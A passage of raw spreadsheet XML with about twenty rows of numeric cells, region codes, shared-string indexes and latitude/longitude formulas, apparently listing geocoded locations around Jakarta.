      </c>
      <c r="G1740" t="s">
        <v>5957</v>
      </c>
      <c r="H1740" t="s">
        <v>26</v>
      </c>
      <c r="I1740" t="s">
        <v>1513</v>
      </c>
      <c r="J1740" t="s">
        <v>5958</v>
      </c>
      <c r="L1740" t="s">
        <v>5959</v>
      </c>
      <c r="M1740">
        <v>3171060010</v>
      </c>
      <c r="N1740">
        <v>3171060</v>
      </c>
      <c r="O1740">
        <v>3171</v>
      </c>
      <c r="P1740">
        <v>31</v>
      </c>
      <c r="Q1740" t="s">
        <v>5113</v>
      </c>
      <c r="R1740" t="s">
        <v>1236</v>
      </c>
      <c r="S1740" t="s">
        <v>108</v>
      </c>
      <c r="T1740" t="s">
        <v>33</v>
      </c>
      <c r="U1740" s="5">
        <v>10681710</v>
      </c>
      <c r="V1740" s="5" t="s">
        <v>16026</v>
      </c>
      <c r="W1740" s="5">
        <v>-623011</v>
      </c>
      <c r="X1740" t="s">
        <v>19791</v>
      </c>
      <c r="Y1740" t="str">
        <f t="shared" si="27"/>
        <v>-6.23011,106.81710</v>
      </c>
    </row>
    <row r="1741" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1741">
        <v>109267</v>
      </c>
      <c r="B1741" s="1">
        <v>43886</v>
      </c>
      <c r="C1741">
        <v>0</v>
      </c>
      <c r="D1741" t="s">
        <v>22</v>
      </c>
      <c r="E1741" t="s">
        <v>23</v>
      </c>
      <c r="F1741" t="s">
        <v>5960</v>
      </c>
      <c r="G1741" t="s">
        <v>5961</v>
      </c>
      <c r="H1741" t="s">
        <v>26</v>
      </c>
      <c r="I1741" t="s">
        <v>3481</v>
      </c>
      <c r="J1741" t="s">
        <v>5962</v>
      </c>
      <c r="L1741" t="s">
        <v>5963</v>
      </c>
      <c r="M1741">
        <v>3175060005</v>
      </c>
      <c r="N1741">
        <v>3175060</v>
      </c>
      <c r="O1741">
        <v>3175</v>
      </c>
      <c r="P1741">
        <v>31</v>
      </c>
      <c r="Q1741" t="s">
        <v>5964</v>
      </c>
      <c r="R1741" t="s">
        <v>2279</v>
      </c>
      <c r="S1741" t="s">
        <v>547</v>
      </c>
      <c r="T1741" t="s">
        <v>33</v>
      </c>
      <c r="U1741" s="5">
        <v>10693674</v>
      </c>
      <c r="V1741" s="5" t="s">
        <v>16027</v>
      </c>
      <c r="W1741" s="5">
        <v>-613537</v>
      </c>
      <c r="X1741" t="s">
        <v>19792</v>
      </c>
      <c r="Y1741" t="str">
        <f t="shared" si="27"/>
        <v>-6.13537,106.93674</v>
      </c>
    </row>
    <row r="1742" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1742">
        <v>109268</v>
      </c>
      <c r="B1742" s="1">
        <v>43886</v>
      </c>
      <c r="C1742">
        <v>0</v>
      </c>
      <c r="D1742" t="s">
        <v>22</v>
      </c>
      <c r="E1742" t="s">
        <v>23</v>
      </c>
      <c r="F1742" t="s">
        <v>5965</v>
      </c>
      <c r="G1742" t="s">
        <v>5966</v>
      </c>
      <c r="H1742" t="s">
        <v>26</v>
      </c>
      <c r="I1742" t="s">
        <v>1201</v>
      </c>
      <c r="J1742" t="s">
        <v>5967</v>
      </c>
      <c r="L1742" t="s">
        <v>5968</v>
      </c>
      <c r="M1742">
        <v>3175020001</v>
      </c>
      <c r="N1742">
        <v>3175020</v>
      </c>
      <c r="O1742">
        <v>3175</v>
      </c>
      <c r="P1742">
        <v>31</v>
      </c>
      <c r="Q1742" t="s">
        <v>2227</v>
      </c>
      <c r="R1742" t="s">
        <v>2228</v>
      </c>
      <c r="S1742" t="s">
        <v>547</v>
      </c>
      <c r="T1742" t="s">
        <v>33</v>
      </c>
      <c r="U1742" s="5">
        <v>10684010</v>
      </c>
      <c r="V1742" s="5" t="s">
        <v>16028</v>
      </c>
      <c r="W1742" s="5">
        <v>-612907</v>
      </c>
      <c r="X1742" t="s">
        <v>19793</v>
      </c>
      <c r="Y1742" t="str">
        <f t="shared" si="27"/>
        <v>-6.12907,106.84010</v>
      </c>
    </row>
    <row r="1743" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1743">
        <v>109269</v>
      </c>
      <c r="B1743" s="1">
        <v>43886</v>
      </c>
      <c r="C1743">
        <v>0</v>
      </c>
      <c r="D1743" t="s">
        <v>22</v>
      </c>
      <c r="E1743" t="s">
        <v>23</v>
      </c>
      <c r="F1743" t="s">
        <v>5969</v>
      </c>
      <c r="G1743" t="s">
        <v>5970</v>
      </c>
      <c r="H1743" t="s">
        <v>26</v>
      </c>
      <c r="I1743" t="s">
        <v>3632</v>
      </c>
      <c r="J1743" t="s">
        <v>3135</v>
      </c>
      <c r="L1743" t="s">
        <v>5971</v>
      </c>
      <c r="M1743">
        <v>3674060003</v>
      </c>
      <c r="N1743">
        <v>3674060</v>
      </c>
      <c r="O1743">
        <v>3674</v>
      </c>
      <c r="P1743">
        <v>36</v>
      </c>
      <c r="Q1743" t="s">
        <v>205</v>
      </c>
      <c r="R1743" t="s">
        <v>169</v>
      </c>
      <c r="S1743" t="s">
        <v>170</v>
      </c>
      <c r="T1743" t="s">
        <v>171</v>
      </c>
      <c r="U1743" s="5">
        <v>10669306</v>
      </c>
      <c r="V1743" s="5" t="s">
        <v>16029</v>
      </c>
      <c r="W1743" s="5">
        <v>-624662</v>
      </c>
      <c r="X1743" t="s">
        <v>19794</v>
      </c>
      <c r="Y1743" t="str">
        <f t="shared" si="27"/>
        <v>-6.24662,106.69306</v>
      </c>
    </row>
    <row r="1744" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1744">
        <v>109270</v>
      </c>
      <c r="B1744" s="1">
        <v>43886</v>
      </c>
      <c r="C1744">
        <v>0</v>
      </c>
      <c r="D1744" t="s">
        <v>22</v>
      </c>
      <c r="E1744" t="s">
        <v>23</v>
      </c>
      <c r="F1744" t="s">
        <v>5972</v>
      </c>
      <c r="G1744" t="s">
        <v>5973</v>
      </c>
      <c r="H1744" t="s">
        <v>26</v>
      </c>
      <c r="I1744" t="s">
        <v>1683</v>
      </c>
      <c r="J1744" t="s">
        <v>5974</v>
      </c>
      <c r="L1744" t="s">
        <v>5975</v>
      </c>
      <c r="M1744">
        <v>3174040006</v>
      </c>
      <c r="N1744">
        <v>3174040</v>
      </c>
      <c r="O1744">
        <v>3174</v>
      </c>
      <c r="P1744">
        <v>31</v>
      </c>
      <c r="Q1744" t="s">
        <v>1553</v>
      </c>
      <c r="R1744" t="s">
        <v>377</v>
      </c>
      <c r="S1744" t="s">
        <v>32</v>
      </c>
      <c r="T1744" t="s">
        <v>33</v>
      </c>
      <c r="U1744" s="5">
        <v>10677344</v>
      </c>
      <c r="V1744" s="5" t="s">
        <v>16030</v>
      </c>
      <c r="W1744" s="5">
        <v>-615569</v>
      </c>
      <c r="X1744" t="s">
        <v>19321</v>
      </c>
      <c r="Y1744" t="str">
        <f t="shared" si="27"/>
        <v>-6.15569,106.77344</v>
      </c>
    </row>
    <row r="1745" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1745">
        <v>109271</v>
      </c>
      <c r="B1745" s="1">
        <v>43886</v>
      </c>
      <c r="C1745">
        <v>0</v>
      </c>
      <c r="D1745" t="s">
        <v>22</v>
      </c>
      <c r="E1745" t="s">
        <v>23</v>
      </c>
      <c r="F1745" t="s">
        <v>5976</v>
      </c>
      <c r="G1745" t="s">
        <v>5977</v>
      </c>
      <c r="H1745" t="s">
        <v>26</v>
      </c>
      <c r="I1745" t="s">
        <v>166</v>
      </c>
      <c r="J1745" t="s">
        <v>3750</v>
      </c>
      <c r="L1745" t="s">
        <v>5978</v>
      </c>
      <c r="M1745">
        <v>3175050002</v>
      </c>
      <c r="N1745">
        <v>3175050</v>
      </c>
      <c r="O1745">
        <v>3175</v>
      </c>
      <c r="P1745">
        <v>31</v>
      </c>
      <c r="Q1745" t="s">
        <v>1012</v>
      </c>
      <c r="R1745" t="s">
        <v>1013</v>
      </c>
      <c r="S1745" t="s">
        <v>547</v>
      </c>
      <c r="T1745" t="s">
        <v>33</v>
      </c>
      <c r="U1745" s="5">
        <v>10689974</v>
      </c>
      <c r="V1745" s="5" t="s">
        <v>16031</v>
      </c>
      <c r="W1745" s="5">
        <v>-617680</v>
      </c>
      <c r="X1745" t="s">
        <v>19197</v>
      </c>
      <c r="Y1745" t="str">
        <f t="shared" si="27"/>
        <v>-6.17680,106.89974</v>
      </c>
    </row>
    <row r="1746" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1746">
        <v>109272</v>
      </c>
      <c r="B1746" s="1">
        <v>43886</v>
      </c>
      <c r="C1746">
        <v>0</v>
      </c>
      <c r="D1746" t="s">
        <v>22</v>
      </c>
      <c r="E1746" t="s">
        <v>23</v>
      </c>
      <c r="F1746" t="s">
        <v>5979</v>
      </c>
      <c r="G1746" t="s">
        <v>5980</v>
      </c>
      <c r="H1746" t="s">
        <v>26</v>
      </c>
      <c r="I1746" t="s">
        <v>332</v>
      </c>
      <c r="J1746" t="s">
        <v>2627</v>
      </c>
      <c r="M1746">
        <v>3275010012</v>
      </c>
      <c r="N1746">
        <v>3275010</v>
      </c>
      <c r="O1746">
        <v>3275</v>
      </c>
      <c r="P1746">
        <v>32</v>
      </c>
      <c r="Q1746" t="s">
        <v>2322</v>
      </c>
      <c r="R1746" t="s">
        <v>287</v>
      </c>
      <c r="S1746" t="s">
        <v>41</v>
      </c>
      <c r="T1746" t="s">
        <v>42</v>
      </c>
      <c r="U1746" s="5">
        <v>10693633</v>
      </c>
      <c r="V1746" s="5" t="s">
        <v>16032</v>
      </c>
      <c r="W1746" s="5">
        <v>-626191</v>
      </c>
      <c r="X1746" t="s">
        <v>19795</v>
      </c>
      <c r="Y1746" t="str">
        <f t="shared" si="27"/>
        <v>-6.26191,106.93633</v>
      </c>
    </row>
    <row r="1747" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1747">
        <v>109273</v>
      </c>
      <c r="B1747" s="1">
        <v>43886</v>
      </c>
      <c r="C1747">
        <v>0</v>
      </c>
      <c r="D1747" t="s">
        <v>22</v>
      </c>
      <c r="E1747" t="s">
        <v>23</v>
      </c>
      <c r="F1747" t="s">
        <v>5981</v>
      </c>
      <c r="G1747" t="s">
        <v>5982</v>
      </c>
      <c r="H1747" t="s">
        <v>26</v>
      </c>
      <c r="I1747" t="s">
        <v>1055</v>
      </c>
      <c r="J1747" t="s">
        <v>2834</v>
      </c>
      <c r="L1747" t="s">
        <v>5983</v>
      </c>
      <c r="M1747">
        <v>3175050003</v>
      </c>
      <c r="N1747">
        <v>3175050</v>
      </c>
      <c r="O1747">
        <v>3175</v>
      </c>
      <c r="P1747">
        <v>31</v>
      </c>
      <c r="Q1747" t="s">
        <v>1740</v>
      </c>
      <c r="R1747" t="s">
        <v>1013</v>
      </c>
      <c r="S1747" t="s">
        <v>547</v>
      </c>
      <c r="T1747" t="s">
        <v>33</v>
      </c>
      <c r="U1747" s="5">
        <v>10691861</v>
      </c>
      <c r="V1747" s="5" t="s">
        <v>16033</v>
      </c>
      <c r="W1747" s="5">
        <v>-616537</v>
      </c>
      <c r="X1747" t="s">
        <v>19796</v>
      </c>
      <c r="Y1747" t="str">
        <f t="shared" si="27"/>
        <v>-6.16537,106.91861</v>
      </c>
    </row>
    <row r="1748" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1748">
        <v>109274</v>
      </c>
      <c r="B1748" s="1">
        <v>43886</v>
      </c>
      <c r="C1748">
        <v>0</v>
      </c>
      <c r="D1748" t="s">
        <v>22</v>
      </c>
      <c r="E1748" t="s">
        <v>23</v>
      </c>
      <c r="F1748" t="s">
        <v>5984</v>
      </c>
      <c r="G1748" t="s">
        <v>5985</v>
      </c>
      <c r="H1748" t="s">
        <v>26</v>
      </c>
      <c r="I1748" t="s">
        <v>4153</v>
      </c>
      <c r="J1748" t="s">
        <v>5986</v>
      </c>
      <c r="L1748" t="s">
        <v>5987</v>
      </c>
      <c r="M1748">
        <v>3174060002</v>
      </c>
      <c r="N1748">
        <v>3174060</v>
      </c>
      <c r="O1748">
        <v>3174</v>
      </c>
      <c r="P1748">
        <v>31</v>
      </c>
      <c r="Q1748" t="s">
        <v>1761</v>
      </c>
      <c r="R1748" t="s">
        <v>1762</v>
      </c>
      <c r="S1748" t="s">
        <v>32</v>
      </c>
      <c r="T1748" t="s">
        <v>33</v>
      </c>
      <c r="U1748" s="5">
        <v>10681882</v>
      </c>
      <c r="V1748" s="5" t="s">
        <v>16034</v>
      </c>
      <c r="W1748" s="5">
        <v>-615765</v>
      </c>
      <c r="X1748" t="s">
        <v>19797</v>
      </c>
      <c r="Y1748" t="str">
        <f t="shared" si="27"/>
        <v>-6.15765,106.81882</v>
      </c>
    </row>
    <row r="1749" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1749">
        <v>109275</v>
      </c>
      <c r="B1749" s="1">
        <v>43886</v>
      </c>
      <c r="C1749">
        <v>0</v>
      </c>
      <c r="D1749" t="s">
        <v>22</v>
      </c>
      <c r="E1749" t="s">
        <v>23</v>
      </c>
      <c r="F1749" t="s">
        <v>5988</v>
      </c>
      <c r="H1749" t="s">
        <v>26</v>
      </c>
      <c r="I1749" t="s">
        <v>1559</v>
      </c>
      <c r="J1749" t="s">
        <v>5989</v>
      </c>
      <c r="L1749" t="s">
        <v>5990</v>
      </c>
      <c r="M1749">
        <v>3175010004</v>
      </c>
      <c r="N1749">
        <v>3175010</v>
      </c>
      <c r="O1749">
        <v>3175</v>
      </c>
      <c r="P1749">
        <v>31</v>
      </c>
      <c r="Q1749" t="s">
        <v>546</v>
      </c>
      <c r="R1749" t="s">
        <v>546</v>
      </c>
      <c r="S1749" t="s">
        <v>547</v>
      </c>
      <c r="T1749" t="s">
        <v>33</v>
      </c>
      <c r="U1749" s="5">
        <v>10680271</v>
      </c>
      <c r="V1749" s="5" t="s">
        <v>16035</v>
      </c>
      <c r="W1749" s="5">
        <v>-613248</v>
      </c>
      <c r="X1749" t="s">
        <v>19798</v>
      </c>
      <c r="Y1749" t="str">
        <f t="shared" si="27"/>
        <v>-6.13248,106.80271</v>
      </c>
    </row>
    <row r="1750" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1750">
        <v>109276</v>
      </c>
      <c r="B1750" s="1">
        <v>43886</v>
      </c>
      <c r="C1750">
        <v>0</v>
      </c>
      <c r="D1750" t="s">
        <v>22</v>
      </c>
      <c r="E1750" t="s">
        <v>23</v>
      </c>
      <c r="F1750" t="s">
        <v>5991</v>
      </c>
      <c r="G1750" t="s">
        <v>5992</v>
      </c>
      <c r="H1750" t="s">
        <v>26</v>
      </c>
      <c r="I1750" t="s">
        <v>555</v>
      </c>
      <c r="J1750" t="s">
        <v>3562</v>
      </c>
      <c r="L1750" t="s">
        <v>250</v>
      </c>
      <c r="M1750">
        <v>3172080007</v>
      </c>
      <c r="N1750">
        <v>3172080</v>
      </c>
      <c r="O1750">
        <v>3172</v>
      </c>
      <c r="P1750">
        <v>31</v>
      </c>
      <c r="Q1750" t="s">
        <v>2307</v>
      </c>
      <c r="R1750" t="s">
        <v>141</v>
      </c>
      <c r="S1750" t="s">
        <v>49</v>
      </c>
      <c r="T1750" t="s">
        <v>33</v>
      </c>
      <c r="U1750" s="5">
        <v>10692119</v>
      </c>
      <c r="V1750" s="5" t="s">
        <v>16036</v>
      </c>
      <c r="W1750" s="5">
        <v>-618316</v>
      </c>
      <c r="X1750" t="s">
        <v>19799</v>
      </c>
      <c r="Y1750" t="str">
        <f t="shared" si="27"/>
        <v>-6.18316,106.92119</v>
      </c>
    </row>
    <row r="1751" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1751">
        <v>109277</v>
      </c>
      <c r="B1751" s="1">
        <v>43886</v>
      </c>
      <c r="C1751">
        <v>0</v>
      </c>
      <c r="D1751" t="s">
        <v>22</v>
      </c>
      <c r="E1751" t="s">
        <v>23</v>
      </c>
      <c r="F1751" t="s">
        <v>5993</v>
      </c>
      <c r="H1751" t="s">
        <v>26</v>
      </c>
      <c r="I1751" t="s">
        <v>290</v>
      </c>
      <c r="J1751" t="s">
        <v>5936</v>
      </c>
      <c r="L1751" t="s">
        <v>5994</v>
      </c>
      <c r="M1751">
        <v>3174030003</v>
      </c>
      <c r="N1751">
        <v>3174030</v>
      </c>
      <c r="O1751">
        <v>3174</v>
      </c>
      <c r="P1751">
        <v>31</v>
      </c>
      <c r="Q1751" t="s">
        <v>1486</v>
      </c>
      <c r="R1751" t="s">
        <v>1487</v>
      </c>
      <c r="S1751" t="s">
        <v>32</v>
      </c>
      <c r="T1751" t="s">
        <v>33</v>
      </c>
      <c r="U1751" s="5">
        <v>10678418</v>
      </c>
      <c r="V1751" s="5" t="s">
        <v>16037</v>
      </c>
      <c r="W1751" s="5">
        <v>-618536</v>
      </c>
      <c r="X1751" t="s">
        <v>19129</v>
      </c>
      <c r="Y1751" t="str">
        <f t="shared" si="27"/>
        <v>-6.18536,106.78418</v>
      </c>
    </row>
    <row r="1752" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1752">
        <v>109278</v>
      </c>
      <c r="B1752" s="1">
        <v>43886</v>
      </c>
      <c r="C1752">
        <v>0</v>
      </c>
      <c r="D1752" t="s">
        <v>22</v>
      </c>
      <c r="E1752" t="s">
        <v>23</v>
      </c>
      <c r="F1752" t="s">
        <v>5995</v>
      </c>
      <c r="G1752" t="s">
        <v>5996</v>
      </c>
      <c r="H1752" t="s">
        <v>26</v>
      </c>
      <c r="I1752" t="s">
        <v>5997</v>
      </c>
      <c r="J1752" t="s">
        <v>93</v>
      </c>
      <c r="L1752" t="s">
        <v>3106</v>
      </c>
      <c r="M1752">
        <v>3174020007</v>
      </c>
      <c r="N1752">
        <v>3174020</v>
      </c>
      <c r="O1752">
        <v>3174</v>
      </c>
      <c r="P1752">
        <v>31</v>
      </c>
      <c r="Q1752" t="s">
        <v>95</v>
      </c>
      <c r="R1752" t="s">
        <v>31</v>
      </c>
      <c r="S1752" t="s">
        <v>32</v>
      </c>
      <c r="T1752" t="s">
        <v>33</v>
      </c>
      <c r="U1752" s="5">
        <v>10676033</v>
      </c>
      <c r="V1752" s="5" t="s">
        <v>16038</v>
      </c>
      <c r="W1752" s="5">
        <v>-616024</v>
      </c>
      <c r="X1752" t="s">
        <v>19759</v>
      </c>
      <c r="Y1752" t="str">
        <f t="shared" si="27"/>
        <v>-6.16024,106.76033</v>
      </c>
    </row>
    <row r="1753" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1753">
        <v>109279</v>
      </c>
      <c r="B1753" s="1">
        <v>43886</v>
      </c>
      <c r="C1753">
        <v>0</v>
      </c>
      <c r="D1753" t="s">
        <v>22</v>
      </c>
      <c r="E1753" t="s">
        <v>23</v>
      </c>
      <c r="F1753" t="s">
        <v>5998</v>
      </c>
      <c r="G1753" t="s">
        <v>5999</v>
      </c>
      <c r="H1753" t="s">
        <v>26</v>
      </c>
      <c r="I1753" t="s">
        <v>6000</v>
      </c>
      <c r="J1753" t="s">
        <v>6001</v>
      </c>
      <c r="L1753" t="s">
        <v>6002</v>
      </c>
      <c r="M1753">
        <v>3171090001</v>
      </c>
      <c r="N1753">
        <v>3171090</v>
      </c>
      <c r="O1753">
        <v>3171</v>
      </c>
      <c r="P1753">
        <v>31</v>
      </c>
      <c r="Q1753" t="s">
        <v>6003</v>
      </c>
      <c r="R1753" t="s">
        <v>347</v>
      </c>
      <c r="S1753" t="s">
        <v>108</v>
      </c>
      <c r="T1753" t="s">
        <v>33</v>
      </c>
      <c r="U1753" s="5">
        <v>10683736</v>
      </c>
      <c r="V1753" s="5" t="s">
        <v>15857</v>
      </c>
      <c r="W1753" s="5">
        <v>-622358</v>
      </c>
      <c r="X1753" t="s">
        <v>19800</v>
      </c>
      <c r="Y1753" t="str">
        <f t="shared" si="27"/>
        <v>-6.22358,106.83736</v>
      </c>
    </row>
    <row r="1754" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1754">
        <v>109280</v>
      </c>
      <c r="B1754" s="1">
        <v>43886</v>
      </c>
      <c r="C1754">
        <v>0</v>
      </c>
      <c r="D1754" t="s">
        <v>22</v>
      </c>
      <c r="E1754" t="s">
        <v>23</v>
      </c>
      <c r="F1754" t="s">
        <v>6004</v>
      </c>
      <c r="G1754" t="s">
        <v>6005</v>
      </c>
      <c r="H1754" t="s">
        <v>26</v>
      </c>
      <c r="I1754" t="s">
        <v>1633</v>
      </c>
      <c r="J1754" t="s">
        <v>5565</v>
      </c>
      <c r="M1754">
        <v>3175030002</v>
      </c>
      <c r="N1754">
        <v>3175030</v>
      </c>
      <c r="O1754">
        <v>3175</v>
      </c>
      <c r="P1754">
        <v>31</v>
      </c>
      <c r="Q1754" t="s">
        <v>1592</v>
      </c>
      <c r="R1754" t="s">
        <v>1563</v>
      </c>
      <c r="S1754" t="s">
        <v>547</v>
      </c>
      <c r="T1754" t="s">
        <v>33</v>
      </c>
      <c r="U1754" s="5">
        <v>10686677</v>
      </c>
      <c r="V1754" s="5" t="s">
        <v>14963</v>
      </c>
      <c r="W1754" s="5">
        <v>-615329</v>
      </c>
      <c r="X1754" t="s">
        <v>19801</v>
      </c>
      <c r="Y1754" t="str">
        <f t="shared" si="27"/>
        <v>-6.15329,106.86677</v>
      </c>
    </row>
    <row r="1755" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1755">
        <v>109281</v>
      </c>
      <c r="B1755" s="1">
        <v>43886</v>
      </c>
      <c r="C1755">
        <v>0</v>
      </c>
      <c r="D1755" t="s">
        <v>22</v>
      </c>
      <c r="E1755" t="s">
        <v>23</v>
      </c>
      <c r="F1755" t="s">
        <v>6006</v>
      </c>
      <c r="G1755" t="s">
        <v>6007</v>
      </c>
      <c r="H1755" t="s">
        <v>26</v>
      </c>
      <c r="I1755" t="s">
        <v>1729</v>
      </c>
      <c r="J1755" t="s">
        <v>648</v>
      </c>
      <c r="L1755" t="s">
        <v>6008</v>
      </c>
      <c r="M1755">
        <v>3174020005</v>
      </c>
      <c r="N1755">
        <v>3174020</v>
      </c>
      <c r="O1755">
        <v>3174</v>
      </c>
      <c r="P1755">
        <v>31</v>
      </c>
      <c r="Q1755" t="s">
        <v>30</v>
      </c>
      <c r="R1755" t="s">
        <v>31</v>
      </c>
      <c r="S1755" t="s">
        <v>32</v>
      </c>
      <c r="T1755" t="s">
        <v>33</v>
      </c>
      <c r="U1755" s="5">
        <v>10677696</v>
      </c>
      <c r="V1755" s="5" t="s">
        <v>15981</v>
      </c>
      <c r="W1755" s="5">
        <v>-617142</v>
      </c>
      <c r="X1755" t="s">
        <v>19802</v>
      </c>
      <c r="Y1755" t="str">
        <f t="shared" si="27"/>
        <v>-6.17142,106.77696</v>
      </c>
    </row>
    <row r="1756" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1756">
        <v>109282</v>
      </c>
      <c r="B1756" s="1">
        <v>43886</v>
      </c>
      <c r="C1756">
        <v>0</v>
      </c>
      <c r="D1756" t="s">
        <v>22</v>
      </c>
      <c r="E1756" t="s">
        <v>23</v>
      </c>
      <c r="F1756" t="s">
        <v>6009</v>
      </c>
      <c r="G1756" t="s">
        <v>6010</v>
      </c>
      <c r="H1756" t="s">
        <v>26</v>
      </c>
      <c r="I1756" t="s">
        <v>753</v>
      </c>
      <c r="J1756" t="s">
        <v>2627</v>
      </c>
      <c r="L1756" t="s">
        <v>6011</v>
      </c>
      <c r="M1756">
        <v>3216082004</v>
      </c>
      <c r="N1756">
        <v>3216082</v>
      </c>
      <c r="O1756">
        <v>3216</v>
      </c>
      <c r="P1756">
        <v>32</v>
      </c>
      <c r="Q1756" t="s">
        <v>5842</v>
      </c>
      <c r="R1756" t="s">
        <v>601</v>
      </c>
      <c r="S1756" t="s">
        <v>41</v>
      </c>
      <c r="T1756" t="s">
        <v>42</v>
      </c>
      <c r="U1756" s="5">
        <v>10705572</v>
      </c>
      <c r="V1756" s="5" t="s">
        <v>16039</v>
      </c>
      <c r="W1756" s="5">
        <v>-619312</v>
      </c>
      <c r="X1756" t="s">
        <v>19803</v>
      </c>
      <c r="Y1756" t="str">
        <f t="shared" si="27"/>
        <v>-6.19312,107.05572</v>
      </c>
    </row>
    <row r="1757" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1757">
        <v>109283</v>
      </c>
      <c r="B1757" s="1">
        <v>43886</v>
      </c>
      <c r="C1757">
        <v>0</v>
      </c>
      <c r="D1757" t="s">
        <v>85</v>
      </c>
      <c r="E1757" t="s">
        <v>23</v>
      </c>
      <c r="F1757" t="s">
        <v>6012</v>
      </c>
      <c r="G1757" t="s">
        <v>6013</v>
      </c>
      <c r="H1757" t="s">
        <v>26</v>
      </c>
      <c r="J1757" t="s">
        <v>6014</v>
      </c>
      <c r="K1757" t="s">
        <v>6015</v>
      </c>
      <c r="L1757" t="s">
        <v>6016</v>
      </c>
      <c r="M1757">
        <v>3175020003</v>
      </c>
      <c r="N1757">
        <v>3175020</v>
      </c>
      <c r="O1757">
        <v>3175</v>
      </c>
      <c r="P1757">
        <v>31</v>
      </c>
      <c r="Q1757" t="s">
        <v>2667</v>
      </c>
      <c r="R1757" t="s">
        <v>2228</v>
      </c>
      <c r="S1757" t="s">
        <v>547</v>
      </c>
      <c r="T1757" t="s">
        <v>33</v>
      </c>
      <c r="U1757" s="5">
        <v>10685416</v>
      </c>
      <c r="V1757" s="5" t="s">
        <v>15182</v>
      </c>
      <c r="W1757" s="5">
        <v>-612524</v>
      </c>
      <c r="X1757" t="s">
        <v>19804</v>
      </c>
      <c r="Y1757" t="str">
        <f t="shared" si="27"/>
        <v>-6.12524,106.85416</v>
      </c>
    </row>
    <row r="1758" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1758">
        <v>109284</v>
      </c>
      <c r="B1758" s="1">
        <v>43886</v>
      </c>
      <c r="C1758">
        <v>0</v>
      </c>
      <c r="D1758" t="s">
        <v>22</v>
      </c>
      <c r="E1758" t="s">
        <v>23</v>
      </c>
      <c r="F1758" t="s">
        <v>6017</v>
      </c>
      <c r="G1758" t="s">
        <v>6018</v>
      </c>
      <c r="H1758" t="s">
        <v>26</v>
      </c>
      <c r="I1758" t="s">
        <v>3275</v>
      </c>
      <c r="J1758" t="s">
        <v>2728</v>
      </c>
      <c r="M1758">
        <v>3175050001</v>
      </c>
      <c r="N1758">
        <v>3175050</v>
      </c>
      <c r="O1758">
        <v>3175</v>
      </c>
      <c r="P1758">
        <v>31</v>
      </c>
      <c r="Q1758" t="s">
        <v>1037</v>
      </c>
      <c r="R1758" t="s">
        <v>1013</v>
      </c>
      <c r="S1758" t="s">
        <v>547</v>
      </c>
      <c r="T1758" t="s">
        <v>33</v>
      </c>
      <c r="U1758" s="5">
        <v>10690472</v>
      </c>
      <c r="V1758" s="5" t="s">
        <v>16040</v>
      </c>
      <c r="W1758" s="5">
        <v>-614216</v>
      </c>
      <c r="X1758" t="s">
        <v>19805</v>
      </c>
      <c r="Y1758" t="str">
        <f t="shared" si="27"/>
        <v>-6.14216,106.90472</v>
      </c>
    </row>
    <row r="1759" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1759">
        <v>109285</v>
      </c>
      <c r="B1759" s="1">
        <v>43886</v>
      </c>
      <c r="C1759">
        <v>0</v>
      </c>
      <c r="D1759" t="s">
        <v>22</v>
      </c>
      <c r="E1759" t="s">
        <v>23</v>
      </c>
      <c r="F1759" t="s">
        <v>6019</v>
      </c>
      <c r="G1759" t="s">
        <v>6020</v>
      </c>
      <c r="H1759" t="s">
        <v>26</v>
      </c>
      <c r="I1759" t="s">
        <v>882</v>
      </c>
      <c r="J1759" t="s">
        <v>3469</v>
      </c>
      <c r="L1759" t="s">
        <v>6021</v>
      </c>
      <c r="M1759">
        <v>3173020005</v>
      </c>
      <c r="N1759">
        <v>3173020</v>
      </c>
      <c r="O1759">
        <v>3173</v>
      </c>
      <c r="P1759">
        <v>31</v>
      </c>
      <c r="Q1759" t="s">
        <v>2041</v>
      </c>
      <c r="R1759" t="s">
        <v>179</v>
      </c>
      <c r="S1759" t="s">
        <v>62</v>
      </c>
      <c r="T1759" t="s">
        <v>33</v>
      </c>
      <c r="U1759" s="5">
        <v>10682835</v>
      </c>
      <c r="V1759" s="5" t="s">
        <v>16041</v>
      </c>
      <c r="W1759" s="5">
        <v>-618572</v>
      </c>
      <c r="X1759" t="s">
        <v>19806</v>
      </c>
      <c r="Y1759" t="str">
        <f t="shared" si="27"/>
        <v>-6.18572,106.82835</v>
      </c>
    </row>
    <row r="1760" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1760">
        <v>109286</v>
      </c>
      <c r="B1760" s="1">
        <v>43886</v>
      </c>
      <c r="C1760">
        <v>0</v>
      </c>
      <c r="D1760" t="s">
        <v>22</v>
      </c>
      <c r="E1760" t="s">
        <v>23</v>
      </c>
      <c r="F1760" t="s">
        <v>6022</v>
      </c>
      <c r="H1760" t="s">
        <v>26</v>
      </c>
      <c r="I1760" t="s">
        <v>383</v>
      </c>
      <c r="J1760" t="s">
        <v>3212</v>
      </c>
      <c r="L1760" t="s">
        <v>6023</v>
      </c>
      <c r="M1760">
        <v>3173050003</v>
      </c>
      <c r="N1760">
        <v>3173050</v>
      </c>
      <c r="O1760">
        <v>3173</v>
      </c>
      <c r="P1760">
        <v>31</v>
      </c>
      <c r="Q1760" t="s">
        <v>2333</v>
      </c>
      <c r="R1760" t="s">
        <v>589</v>
      </c>
      <c r="S1760" t="s">
        <v>62</v>
      </c>
      <c r="T1760" t="s">
        <v>33</v>
      </c>
      <c r="U1760" s="5">
        <v>10686799</v>
      </c>
      <c r="V1760" s="5" t="s">
        <v>16042</v>
      </c>
      <c r="W1760" s="5">
        <v>-618537</v>
      </c>
      <c r="X1760" t="s">
        <v>19807</v>
      </c>
